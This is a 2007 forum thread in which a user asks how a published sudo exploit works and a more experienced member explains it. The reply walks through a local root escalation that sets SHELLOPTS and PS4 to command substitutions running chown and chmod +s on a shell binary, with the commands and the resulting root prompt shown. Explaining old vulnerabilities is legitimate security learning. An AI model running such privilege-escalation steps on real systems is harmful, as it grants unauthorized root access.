| View previous topic :: View next topic |
| Author |
Message |
dinsmore
n00b
Joined: 19 Apr 2006
Posts: 54
|
 Posted: Thu Nov 15, 2007 6:51 pm Post subject: please help me undestrand this expploit for sudo :P |
 |
|
hi
i need to test this exploit on my machine:
http://www.securiteam.com/exploits/6R00E00EKU.html
but i can't seem to understand what is it doing when setting the envirorment options SHELLOPTS and PS4.... is the x.sh script supposed to execute the commands set into those env variables??
also, i'm guessing that i'm not supposed to have write permissions on the x.sh script, otherwise it would be stupid to setenv instead of just writing the commands into the script...
i don't know much about csh, only that it's a C like shell with simmilar sintax maybe....
any help here?
thnx ! |
|
| Back to top |
|
 |
timeBandit
Bodhisattva
Joined: 31 Dec 2004
Posts: 2719
Location: here, there or in transit
|
| Posted: Thu Nov 15, 2007 7:27 pm Post subject: |
|
|
SHELLOPTS=xtrace turns on script tracing, equivalent to set -x in bash. The PS4 prompt string is the prompt echoed when tracing is on. Per the Bash manual: | Quote: | PS4
The value is the prompt printed before the command line is echoed when the `-x' option is set (see section 4.3 The Set Builtin). The first character of PS4 is replicated multiple times, as necessary, to indicate multiple levels of indirection. The default is `+ '. |
The same applies to csh (as evidenced by the viability of this exploit).
The exploit requires access to a user who can execute any shell script with root privileges via sudo. The x.sh script is merely an example. When tracing is on, the user's shell evaluates and echoes the PS4 prompt string before each command in the script. However, since the script is run via sudo the shell evaluates PS4 as root. Thus the attacker can inject arbitrary commands (via PS4) into the execution environment of the script, without actually modifying the script.
Following the example: | Code: | gcc -o egg egg.c
% setenv SHELLOPTS xtrace
% setenv PS4 '$(chown root:root egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ls -lisa egg
1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg
|
The above compiles a small program that simply launches a shell, then uses the sudo exploit to give root ownership of the executable. The command in PS4 is executed immediately before the shell prints "echo Getting root!!" (because tracing is on).
| Code: | % setenv PS4 '$(chmod +s egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!! |
Use the exploit again to run another command as root, this time setting the setuid bit on the executable. Now egg will run as root.
| Code: | % ./egg
sh-3.00# id
uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno) |
Run egg and hey-presto: you have a root shell. 
 /me sends myself a note to check sudo versions and add "set +x" to my (mercifully few) setuid-root scripts when I get home. 
_________________
Plants are pithy, brooks tend to babble--I'm content to lie between them.
Super-short f.g.o checklist: Search first, strip comments, mark solved, help others. |
|
| Back to top |
|
|
dinsmore
n00b
Joined: 19 Apr 2006
Posts: 54
|
| Posted: Tue Nov 20, 2007 1:25 pm Post subject: |
|
|
that's what i thought, but doing exactly as the description says, it didn't work for me..... Why does the script call bash if we're running from CSH?? will it execute the commands on the ps4 env from csh??
when i run the x.sh with sudo, it doesn't changes egg ownership..... |
|
| Back to top |
|
|
dinsmore
n00b
Joined: 19 Apr 2006
Posts: 54
|
| Posted: Tue Nov 20, 2007 1:36 pm Post subject: |
|
|
the exploit description says vulnerable versions to be <1.6.8p10. I have 1.6.8p9..........maybe i should try an older version since they are pretty close.
Does that sound reasonable? |
|
| Back to top |
|
|
timeBandit
Bodhisattva
Joined: 31 Dec 2004
Posts: 2719
Location: here, there or in transit
|
| Posted: Tue Nov 20, 2007 5:59 pm Post subject: |
|
|
| dinsmore wrote: | | Why does the script call bash if we're running from CSH?? will it execute the commands on the ps4 env from csh?? |
It doesn't, I cited the Bash manaual as a reference for PS4 because I had it handy. PS1-PS4 are POSIX variables AFAIK (meaning they're the same for csh and Bash).
As for why it doesn't work for you, perhaps csh was patched to close this hole? I've no idea. csh makes my head hurt. I had the same version of sudo as you but upgraded over the weekend. I can no longer reproduce the experiment.
_________________
Plants are pithy, brooks tend to babble--I'm content to lie between them.
Super-short f.g.o checklist: Search first, strip comments, mark solved, help others. |
|
| Back to top |
|
|
dinsmore
n00b
Joined: 19 Apr 2006
Posts: 54
|
| Posted: Thu Nov 22, 2007 4:37 pm Post subject: |
|
|
ahm, then why does the x.sh example script starts with
#!/bin/bash -x
??
i found my sudo to be blocking env variables such as PS4. you can see this by typing "sudo -V" as root... I edited the sudoers config file to change this, but sudo keeps the same behaviour.. :S |
|
| Back to top |
|
|
dinsmore
n00b
Joined: 19 Apr 2006
Posts: 54
|
| Posted: Thu Nov 22, 2007 5:16 pm Post subject: |
|
|
i installed an older version of sudo which didn't block those variables, so, it worked niiice
tnx for the help.....
peace out! lol
##EDIT##
btw, nice ken pic  |
|
| Back to top |
|
|
timeBandit
Bodhisattva
Joined: 31 Dec 2004
Posts: 2719
Location: here, there or in transit
|
| Posted: Fri Nov 23, 2007 4:46 pm Post subject: |
|
|
| dinsmore wrote: | ahm, then why does the x.sh example script starts with
#!/bin/bash -x |
Because I have a large blind spot that obscured the first line of the script.
Apologies, I locked on to the use of csh in the example and didn't think it through. I told you csh makes my head hurt.
Glad I could help, and thanks for noticing CK!
_________________
Plants are pithy, brooks tend to babble--I'm content to lie between them.
Super-short f.g.o checklist: Search first, strip comments, mark solved, help others. |
|
| Back to top |
|
|
dinsmore
n00b
Joined: 19 Apr 2006
Posts: 54
|
| Posted: Mon Nov 26, 2007 3:44 pm Post subject: |
|
|
i was wondering.... where did you get that ken pic? i've been searching for info about ken to see if i can get it for linux, but i can't seem to find any info or pics.... (i'm assuming that pic is from the ken pc game... i used to play it for dos lol)
.. 
 |
|
| Back to top |
|
|
timeBandit
Bodhisattva
Joined: 31 Dec 2004
Posts: 2719
Location: here, there or in transit
|
| Posted: Mon Nov 26, 2007 6:30 pm Post subject: |
|
|
| dinsmore wrote: | | i was wondering.... where did you get that ken pic? |
I GIMPed a screen shot from the DOS game.
_________________
Plants are pithy, brooks tend to babble--I'm content to lie between them.
Super-short f.g.o checklist: Search first, strip comments, mark solved, help others. |
|
| Back to top |
|
|
|
Networking & Security
